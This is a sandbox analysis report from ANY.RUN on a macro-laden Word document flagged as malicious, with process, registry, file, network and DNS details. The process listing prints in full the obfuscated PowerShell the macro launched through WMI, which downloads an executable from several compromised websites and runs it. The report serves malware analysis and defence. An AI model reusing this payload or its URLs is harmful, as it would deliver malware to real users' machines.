File name:

1778a2ad2b4663a62510c1c6225e527eb051c0c0cea5165d95a3190aeaa2f7af

Full analysis: https://app.any.run/tasks/84cadf70-e3cd-47d6-b58c-e7da2c3e1a4d
Verdict: Malicious activity
Analysis date: December 13, 2024, 21:41:14
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: Aut., Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 28 16:28:00 2020, Last Saved Time/Date: Fri Dec 13 09:24:00 2024, Number of Pages: 1, Number of Words: 10450, Number of Characters: 59565, Security: 8
MD5:

203709D8654FE2CD3BDD52DDC47214F6

SHA1:

2B6AE51CC2C2656316C27BA372293666EA4DB299

SHA256:

1778A2AD2B4663A62510C1C6225E527EB051C0C0CEA5165D95A3190AEAA2F7AF

SSDEEP:

1536:jTvRHqWvF77NhXnqdbTGCmt4mB1ePS0/zM/aUcagb2ZBhmEd1yWHefzdoFWoUW6M:3RDd/NhaNsRgPv7xagb2Zv+nmLB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 5004)
  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 5004)
    • Executed via WMI

      • powershell.exe (PID: 4136)
    • Creates a directory (POWERSHELL)

      • powershell.exe (PID: 4136)
  • INFO

    • Reads the software policy settings

      • powershell.exe (PID: 4136)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 4136)
    • Sends debugging messages

      • WINWORD.EXE (PID: 5004)
    • Create files in a temporary directory

      • powershell.exe (PID: 4136)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 4136)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4136)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4136)
    • Checks proxy server information

      • powershell.exe (PID: 4136)
    • Disables trace logs

      • powershell.exe (PID: 4136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: Aut.
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2020:10:28 16:28:00
ModifyDate: 2024:12:13 09:24:00
Security: Locked for annotations
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 69876
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Aut.
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 10450
Characters: 59565
Pages: 1
Paragraphs: 139
Lines: 496
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
125
Monitored processes
5
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe conhost.exe no specs ai.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3092"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "F2F20A3D-BF3B-44F5-98C1-0FBBF985E4D4" "CC5991D7-FA6C-40FB-8365-19906940AF60" "5004"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
4136POwersheLL -ENCOD S E T - I T e M     ( " V " + " A r i A B L " + " E : p b A " )     ( [ T Y P E ] ( " { 2 } { 3 } { 0 } { 1 } " - f ' . i O . d ' , ' i R e C T O r Y ' , ' s y S t E ' , ' m ' )   ) ;       S e t - i t e m     ( ' v A ' + ' R ' + ' I a b l E : t s O ' )     (     [ t Y P E ] ( " { 5 } { 0 } { 1 } { 4 } { 2 } { 3 } "   - f ' M . ' , ' n e t . s e ' , ' o I n T M a N A g ' , ' E r ' , ' r v I c E p ' , ' s Y S T e ' ) )     ;   $ G t u 5 7 p _ = ( ( ' T z 4 c c ' + ' e ' ) + ' 2 ' ) ; $ A s 1 f i m g = $ U z 4 0 u 7 2   +   [ c h a r ] ( 6 4 )   +   $ J 7 u 9 f x o ; $ J _ 7 1 4 m q = ( ( ' F x o a ' + ' s ' ) + ' m 8 ' ) ;     $ P b A : : " C r ` e a T ` E D I R E C t ` O R y " ( $ H O M E   +   ( ( ' { 0 } V h 5 ' + ' f 1 k o { 0 } G ' + ' 0 ' + ' g ' + ' k g ' + ' 4 f { 0 ' + ' } ' )   - f   [ C h A r ] 9 2 ) ) ; $ F c s r a g f = ( ' U ' + ( ' f r ' + ' a 7 ' ) + ' c c ' ) ;     (     v A R i a B L e     ( ' T s ' + ' o ' )   - V a l U   ) : : " s E c ` U r i t Y ` P r o t O C ` O L "   =   ( ' T ' + ( ' l s ' + ' 1 2 ' ) ) ; $ I w 1 d i b m = ( ( ' G n 2 ' + ' 9 ' ) + ( ' s ' + ' 2 8 ' ) ) ; $ L _ a x g o b   =   ( ' Z q ' + ' 1 ' + ( ' c ' + ' e 8 ' ) ) ; $ E 5 s 9 x 7 p = ( ( ' D u ' + ' j ' ) + ' z ' + ( ' 7 ' + ' w 5 ' ) ) ; $ E 2 b i x p h = ( ' B ' + ( ' i ' + ' q a q ' ) + ' m _ ' ) ; $ N z j 4 u 4 j = $ H O M E + ( ( ( ' g d i ' + ' V ' + ' h 5 ' ) + ' f 1 ' + ' k o ' + ' g d ' + ( ' i G 0 g k ' + ' g 4 f ' ) + ( ' g d ' + ' i ' ) ) . " R ` e P L a ` c e " ( ( [ c h A r ] 1 0 3 + [ c h A r ] 1 0 0 + [ c h A r ] 1 0 5 ) , ' \ ' ) ) + $ L _ a x g o b + ( ' . e ' + ' x e ' ) ; $ L p u j 2 d z = ( ( ' V 5 ' + ' w ' ) + ( ' n i ' + ' b a ' ) ) ; $ C c e m 6 0 d = . ( ' n ' + ' e w - ' + ' o b j e c t ' )   N e t . W e b c l i e n T ; $ U s 9 x k h q = ( ( ( ' h t ' + ' t ' ) + ( ' p s : ' + ' ] [   ' ) + ' ( ' + ( ' 0 ' + '   h ' ) + ' u B ' + ( ' J   ' + ' [ ' + ' ]   [ ] w ] ' + ' [ ' ) + '   ' + ' ( ' + ' 0 ' + ( '   h u B ' + ' J   ' + ' [ ' ) + ( ' ] ' + '   [ ] ' ) + ( ' w s o ' + ' c i ' ) + ( ' a l ' + ' p l a ' ) + ' y ' + ' m ' + ( ( ' e d i a . c o m ] [   ' + ' ( ' + ' 0 ' ) ) + '   h ' + ( ' u ' + ' B J   [ ] ' ) + ( '   ' + ' [ ] w w ' ) + ( ' p - ' + ' c o n ' ) + ' t e ' + ( ( ' n t ] ' + ' [   ( 0   ' + ' h ' ) ) + ( ' u ' + ' B J   ' + ' [ ] ' ) + ( '   [ ] w ' + ' C ' + ' z j ' ) + ( ( ' ] [   ( ' + ' 0   h u ' + ' B ' ) ) + ' J ' + ( '   ' + ' [ ] ' + '   [ ] ' ) + ( ( ' w @ h t ' + ' t p : ] [   ' + ' ( 0   ' + ' h u ' + ' B ' ) ) + ' J   ' + ( ' [ ' + ' ]   [ ' ) + ( ' ] ' + ' w ] [ ' ) + ( ( '   ( 0 ' + '   h u B ' ) ) + ( ' J   [ ] ' + '   [ ] ' + ' w f ' ) + ( ' l o r u ' + ' m ' ) + ' g r ' + ' o ' + ( ' u ' + ' p s . n e ' + ' t ] ' ) + ( ( ' [   ' + ' ( ' ) ) + ( ' 0   h ' + ' u ' + ' B J ' + '   [ ]   [ ] ' + ' w m ' ) + ' y ' + ( ' s ' + ' i t e ' ) + ( ' ] ' + ' [   ' ) + ( ( ' ( 0   h ' + ' u ' + ' B ' ) ) + ( ' J ' + '   [ ]   [ ] ' + ' w C 0 ' ) + ( ' N ' + ' Y B d ' ) + ' ] ' + ' [ ' + ( ( '   ( 0 ' + '   ' ) ) + ( ' h ' + ' u B ' + ' J   [ ]   ' + ' [ ] w ' ) + ( ' @ ' + ' h t ' ) + ( ' t p ' + ' : ] [ ' ) + ( ( '   ( ' + ' 0 ' ) ) + ( '   ' + ' h u B J ' + '   [ ]   ' ) + ( ( ' [ ] w ] [   ' + ' ( 0   h u ' + ' B ' + ' J   ' ) ) + ( ' [ ]   [ ] ' + ' w d a e ' + ' g . s ' + ' u ' ) + ' ] [ ' + ( ( '   ( 0   ' + ' h ' + ' u B J ' ) ) + ( '   ' + ' [ ] ' ) + ( '   [ ' + ' ] w w ' + ' p ' ) + ( ' - c ' + ' o ' ) + ( ' n t ' + ' e n t ' + ' ] [ ' ) + ( ( '   ( 0   h ' + ' u B ' ) ) + ( ' J   ' + ' [ ' ) + ' ]   ' + ' [ ] ' + ( ' w i Y H ' + ' ] ' ) + ' [ ' + '   ' + ( ( ' ( 0   h ' + ' u ' + ' B ' ) ) + ' J ' + ( '   [ ' + ' ] ' ) + '   [ ' + ( ' ] ' + ' w @ ' ) + ( ' h t t ' + ' p ' + ' : ] [ ' ) + ( ( '   ( 0 ' + '   h ' ) ) + ( ' u B J ' + '   [ ] ' + '   [ ] ' ) + ( ( ' w ] [   ( 0   h u ' + ' B J ' + '   [ ] ' + '   [ ' ) ) + ( ' ] w t e r a ' + ' s ' + ' r ' + ' u m a h ' + ' k a ' ) + ( ' y ' + ' u ' + ' . c o m ] ' ) + ( ( ' [   ' + ' ( ' ) ) + ( ' 0   h u B J   ' + ' [ ' + ' ]   [ ] ' ) + ( ' w w p ' + ' - ' + ' a d ' ) + ' m i ' + ( ( ' n ] ' + ' [ ' + '   ( 0   h ' ) ) + ' u B ' + ( ' J ' + '   [ ' + ' ]   [ ] ' ) + ( ' w d H ' + ' e L E ' ) + ( ( ' ] ' + ' [   ( ' + ' 0   h ' ) ) + ( ' u ' + ' B J   ' ) + ' [ ' + ( ' ]   [ ' + ' ] ' ) + ' w @ ' + ' h t ' + ( ' t p : ' + ' ] ' ) + ( ( ' [ ' + '   ( 0 ' + '   h u ' ) ) + ( ' B J   ' + ' [ ] ' ) + '   ' + ( ' [ ' + ' ] w ' ) + ( ( ' ] [   ( ' + ' 0   h u B ' + ' J ' + '   [ ' + ' ]   [ ' ) ) + ' ] w ' + ' 9 0 ' + ( ' 4 y . c ' + ' o m ' + ' ] [ ' ) + ( ( '   ( ' + ' 0 ' + '   h u B J ' ) ) + '   ' + ' [ ' + ( ' ] ' + '   [ ' ) + ( ' ] w h o w ' + ' - ' + ' t ' ) + ( ( ' o ' + ' ] [   ( ' ) ) + ' 0   ' + ( ' h u ' + ' B J   [ ]   ' ) + ' [ ] ' + ' w ' + ( ' A 6 ' + ' ] [ ' ) + ( ( '   ( 0 ' + '   ' + ' h u B J   ' ) ) + ( ' [ ]   [ ' + ' ] w @ ' + ' h t t p : ' ) + ( ( ' ] ' + ' [   ( 0 ' ) ) + '   h ' + ( ' u B J ' + '   ' ) + ' [ ' + ' ] ' + '   [ ' + ' ] ' + ( ( ' w ] [ ' + '   ( ' ) ) + ( ' 0 ' + '   h ' ) + ' u ' + ( ' B ' + ' J   [ ' + ' ]   ' + ' [ ] w d i e t ' + ' e t i ' + ' c i e ' ) + ( ' n n ' + ' e - ' ) + ' t i ' + ( ' f f a ' + ' n y . c ' + ' o m ] [   ' ) + ( ( ' ( 0   ' + ' h ' ) ) + ( ' u ' + ' B J ' ) + ( '   [ ' + ' ]   [ ] ' ) + ( ' w w p - i n ' + ' c l ' + ' u ' ) + ' d ' + ' e ' + ( ( ' s ] ' + ' [   ( ' ) ) + ' 0   ' + ( ' h u ' + ' B ' ) + ( ' J   ' + ' [ ' ) + ( ' ] ' + '   [ ] ' ) + ' w ' + ' r ' + ( ' G ' + ' J a L ' ) + ( ' g 5 ' + ' ] [ ' ) + ( ( '   ' + ' ( 0 ' + '   h u B J   ' + ' [ ]   [ ] ' ) ) + ' w @ ' + ( ( ' h t t p : ] ' + ' [   ( ' + ' 0 ' + '   h ' ) ) + ( ( ' u B J   [ ]   [ ' + ' ] w ] [ ' + '   ' + ' ( 0   h ' ) ) + ' u B ' + ( ' J   [ ]   ' + ' [ ] ' + ' w d ' ) + ' o ' + ( ' t ' + ' a s a ' ) + ( ' r i ' + ' m . c o ' + ' m ] [ ' ) + ( ( '   ( ' ) ) + ( ' 0   h ' + ' u ' ) + ' B J ' + ( '   [ ' + ' ]   [ ] w w ' ) + ( ' p - ' + ' a d m i n ' + ' ] ' ) + ( ( ' [   ( 0 ' + '   h ' + ' u B J   [ ' ) ) + ( ' ]   [ ] ' + ' w ' ) + ' D ' + ( ( ' y z ] [ ' + '   ( 0 ' + '   h u B ' ) ) + ( ' J ' + '   [ ' ) + ( ' ]   [ ] w @ h t ' + ' t ' + ' p ' + ' s ' + ' : ] [ ' ) + '   ' + ' ( ' + ( ( ' 0   h u B J ' + '   [ ]   ' + ' [ ] w ] [ ' + '   ( 0   h ' + ' u ' ) ) + ( ' B J   ' + ' [ ] ' ) + '   ' + ( ' [ ] w ' + ' m o b ' ) + ( ' i s ' + ' - a u t o l ' ) + ' o a ' + ( ' n . c ' + ' o m ' ) + ' ] [ ' + ( ( '   ' + ' ( 0 ' ) ) + '   ' + ( ' h u ' + ' B J ' + '   [ ] ' ) + '   ' + ' [ ] ' + ( ' w w p - ' + ' c ' + ' o ' ) + ( ' n t ' + ' e ' ) + ( ' n ' + ' t ] [ ' ) + ( ( '   ' + ' ( 0   ' ) ) + ' h u ' + ' B ' + ( ' J   ' + ' [ ' ) + ' ]   ' + ' [ ' + ( ' ] w Y v q o B ' + ' s e ' + ' ] [ ' ) + ( ( '   ' + ' ( 0 ' ) ) + ( '   h u B ' + ' J   [ ' ) + ' ]   ' + ( ' [ ' + ' ] w ' ) ) ) . " R e p ` l ` A c e " ( ( ( ( ( ' ] [ ' + '   ( ' ) ) + ' 0 ' + ( '   h u ' + ' B ' ) + ( ' J   ' + ' [ ' ) + ( ' ]   [ ' + ' ] w ' ) ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s p ` L i t " ( $ E u t l d y u   +   $ A s 1 f i m g   +   $ Q w 7 p p p e ) ; $ O i j r c v e = ( ' B r ' + ( ' o 5 ' + ' 5 5 ' ) + ' x ' ) ; f o r e a c h   ( $ C l _ i v 3 i   i n   $ U s 9 x k h q ) { t r y { $ C c e m 6 0 d . " D O W N L ` O a ` D f i L E " ( $ C l _ i v 3 i ,   $ N z j 4 u 4 j ) ; $ F b 7 7 5 z 9 = ( ( ' W 4 x ' + ' f ' ) + ( ' i ' + ' k g ' ) ) ; I f   ( ( & ( ' G e t ' + ' - I t e ' + ' m ' )   $ N z j 4 u 4 j ) . " l ` e n g T H "   - g e   3 8 4 5 1 )   { ( [ w m i c l a s s ] ( ' w i ' + ( ' n ' + ' 3 2 ' ) + ( ' _ P ' + ' r o ' ) + ( ' c e s ' + ' s ' ) ) ) . " C r ` E a T E " ( $ N z j 4 u 4 j ) ; $ U 5 a 3 u m v = ( ( ' L ' + ' j x k 1 ' ) + ' 9 4 ' ) ; b r e a k ; $ W h n u i _ 7 = ( ( ' N v k ' + ' 0 ' ) + ( ' _ ' + ' 6 4 ' ) ) } } c a t c h { } } $ Z d a a x j y = ( ' H ' + ( ' q n ' + ' q l r ' ) + ' f ' )  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4716\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5004"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\1778a2ad2b4663a62510c1c6225e527eb051c0c0cea5165d95a3190aeaa2f7af.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
19 426
Read events
19 049
Write events
354
Delete events
23

Modification events

(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5004
Operation:writeName:0
Value:
0B0E10DF0928D3A4CD484580198CF1826FE80B230046E1B88D85FCB4D3ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C5118C27D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:pt-br
Value:
2
Executable files
24
Suspicious files
122
Text files
27
Unknown types
0

Dropped files

PID
Process
Filename
Type
5004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:9F8071C262F041EA4C7E63D9C593F6F5
SHA256:8224E724042803516CF3CD90F5CE41978432D50EB72A1A366D2BD3DE190ABE9E
5004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\61A9769F-EA21-4445-9AC7-858D2CC53454xml
MD5:1C173C183A30332CB065D992569290D9
SHA256:2459DABDACBB734C9ABC4709216190DE90150DD8A530E7B1B38DEF096F2E6E39
5004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:5548FEBD2DB1C7A37F2BA08F1781C642
SHA256:C25CE5A8EF5985BF6725DAB8079BC9E474460CA677EBE6D1F18B00509BCD9385
5004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdbinary
MD5:56F077C49AFA63B9D2D89D4CEA9DDA48
SHA256:E19CA78ACD0665564037EDD1BCCE92E528024AD6B9E7D68E6F05E341F9EF5CC7
5004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
5004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:897CC985EB6C86A001712788AC5CD0F3
SHA256:AE6AD6F14DE6167DD81A26C383F49DE2E4F78540BB3C8BFC5A5B398DBEE8E9CA
5004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.Sbinary
MD5:D0893374A0E3D0B53023D83166DF4395
SHA256:853A0E58826E809EA70288A7E6EC33EB2E3454C469F74BB8CB01B09B19880400
4136powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2wrbbgh3.rkc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:7C3314D37461FE613AE081F0B4469112
SHA256:B1BC0FC8BC2BFFF84B385CE264835BCDF8A5BC8F2F1C8468EF1C9354D26DB177
5004WINWORD.EXEC:\Users\admin\Desktop\~$78a2ad2b4663a62510c1c6225e527eb051c0c0cea5165d95a3190aeaa2f7af.docbinary
MD5:773C183A2D91C0CB623B058ECAD4B978
SHA256:0CB0E960084FEA1D760955E29370D0D7A1835670AD2020B91D2AED032104E8E5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
82
TCP/UDP connections
93
DNS requests
27
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2356
svchost.exe
GET
200
23.48.23.169:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2356
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4136
powershell.exe
GET
301
92.255.111.71:80
http://daeg.su/wp-content/iYH/
unknown
malicious
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4136
powershell.exe
GET
301
145.239.37.162:80
http://dieteticienne-tiffany.com/wp-includes/rGJaLg5/
unknown
malicious
4136
powershell.exe
GET
302
54.209.32.212:80
http://904y.com/how-to/A6/
unknown
shared
4136
powershell.exe
GET
301
92.255.111.71:80
http://daeg.su/wp-content/iYH
unknown
malicious
4136
powershell.exe
GET
301
145.239.37.162:80
http://www.dieteticienne-tiffany.com/wp-includes/rGJaLg5/
unknown
malicious
GET
200
23.48.23.52:443
https://omex.cdn.office.net/addinclassifier/officesharedentities
unknown
text
314 Kb
whitelisted
GET
200
52.113.194.132:443
https://ecs.office.com/config/v2/Office/word/16.0.16026.20146/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=word&Platform=win32&Version=16.0.16026.20146&MsoVersion=16.0.16026.20002&SDX=fa000000002.2.0.1907.31003&SDX=fa000000005.1.0.1909.30011&SDX=fa000000006.1.0.1909.13002&SDX=fa000000008.1.0.1908.16006&SDX=fa000000009.1.0.1908.6002&SDX=fa000000016.1.0.1810.13001&SDX=fa000000029.1.0.1906.25001&SDX=fa000000033.1.0.1908.24001&SDX=wa104381125.1.0.1810.9001&ProcessName=winword.exe&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=6&LicenseSKU=Professional2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bD32809DF-CDA4-4548-8019-8CF1826FE80B%7d&LabMachine=false
unknown
binary
398 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2356
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
92.123.104.43:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5004
WINWORD.EXE
52.109.32.97:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
5004
WINWORD.EXE
23.48.23.43:443
omex.cdn.office.net
Akamai International B.V.
DE
whitelisted
5004
WINWORD.EXE
52.113.194.132:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.169:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
www.bing.com
  • 92.123.104.43
  • 92.123.104.30
  • 92.123.104.23
  • 92.123.104.63
  • 92.123.104.34
  • 92.123.104.33
  • 92.123.104.31
  • 92.123.104.21
  • 92.123.104.17
whitelisted
google.com
  • 142.250.185.238
whitelisted
officeclient.microsoft.com
  • 52.109.32.97
whitelisted
omex.cdn.office.net
  • 23.48.23.43
  • 23.48.23.45
  • 23.48.23.11
  • 23.48.23.55
  • 23.48.23.52
  • 23.48.23.66
  • 23.48.23.29
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
crl.microsoft.com
  • 23.48.23.169
  • 23.48.23.194
  • 23.48.23.145
  • 23.48.23.143
  • 23.48.23.158
  • 23.48.23.147
  • 23.48.23.173
  • 23.48.23.167
  • 23.48.23.176
  • 23.48.23.164
whitelisted
messaging.lifecycle.office.com
  • 52.111.243.12
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
socialplaymedia.com
  • 173.255.194.250
malicious

Threats

PID
Process
Class
Message
4136
powershell.exe
Potentially Bad Traffic
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
4136
powershell.exe
Potentially Bad Traffic
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.